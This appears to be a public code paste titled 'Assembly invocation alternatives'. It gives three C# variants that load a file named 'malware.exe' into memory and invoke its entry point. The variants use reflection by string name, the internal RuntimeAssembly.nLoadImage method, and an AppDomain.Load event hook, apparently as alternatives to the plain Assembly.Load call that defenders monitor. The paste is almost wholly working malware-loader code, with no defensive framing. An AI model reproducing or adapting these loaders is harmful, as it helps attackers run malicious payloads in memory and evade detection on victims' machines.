Assembly invocation alternatives - C#

SUBMITTED BY: emmek

DATE: June 27, 2022, 10:37 p.m.

FORMAT: C#

SIZE: 2.8 kB

Raw Download

HITS: 6451

Report
  1. //Using reflection to call methods by string name.
  2. namespace pg1 {
  3. public static class Program {
  4. public static void Main() {
  5. var filename = "malware.exe";
  6. var assembly = Call(typeof(Assembly), "Load", System.IO.File.ReadAllBytes(filename)) as Assembly;// or (Assembly)...
  7. Call(typeof(Program), "InvokeEntrypoint", assembly);
  8. }
  9. public static void InvokeEntrypoint(Assembly asm) {
  10. asm.EntryPoint.Invoke(null, new[] {new string[] {"1"}});
  11. }
  14. //Calls method using reflection, instead of directly
  15. public static object Call(Type space, string name, params object[] argv) {
  16. List<Type> ptyp = new List<Type>();
  17. foreach(var o in argv) {
  18. ptyp.Add(o.GetType());
  19. }
  20. var m = space.GetMethod(name, ptyp.ToArray());
  21. return m.Invoke(null, argv);
  22. }
  23. }
  24. }
  27. //Using the internal method nLoadImage (from System.Reflection.RuntimeAssembly)
  28. namespace pg1 {
  29. public static class Program {
  30. public static void Main() {
  31. /*
  32. Get the malware data
  33. */
  34. var data = System.IO.File.ReadAllBytes("malware.exe");
  35. /*
  36. Invoke the internal method _nLoad
  37. */
  38. var assembly = InternalLoad(data);
  39. /*
  40. Execute
  41. */
  42. InvokeEntrypoint(assembly);
  43. }
  44. public static Assembly InternalLoad(byte[] image) {
  45. return Type.GetType("System.Reflection.RuntimeAssembly").GetMethod("nLoadImage", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { image, null, null, null, false, null }) as Assembly;
  46. }
  47. public static void InvokeEntrypoint(Assembly asm) {
  48. asm.EntryPoint.Invoke(null, new[] {new string[] {"1"}});
  49. }
  50. }
  51. }
  54. //Using the AppDomain.Load method
  55. namespace pg1 {
  56. public static class Program {
  57. public static void Main() {
  58. var data = System.IO.File.ReadAllBytes("malware.exe");
  59. SetupInvoker(); //call only once, invokes the entrypoint
  60. var assembly = AppDomainLoad(data);
  61. }
  62. public static void SetupInvoker() {
  63. AppDomain.CurrentDomain.AssemblyLoad += delegate(object sender, AssemblyLoadEventArgs args) {
  64. InvokeEntrypoint(args.LoadedAssembly);
  65. };
  66. }
  67. public static Assembly AppDomainLoad(byte[] image) {
  68. return AppDomain.CurrentDomain.Load(image);
  69. }
  70. public static void InvokeEntrypoint(Assembly asm) {
  71. asm.EntryPoint.Invoke(null, new[] {new string[] {"1"}});
  72. }
  73. }
  74. }
comments powered by Disqus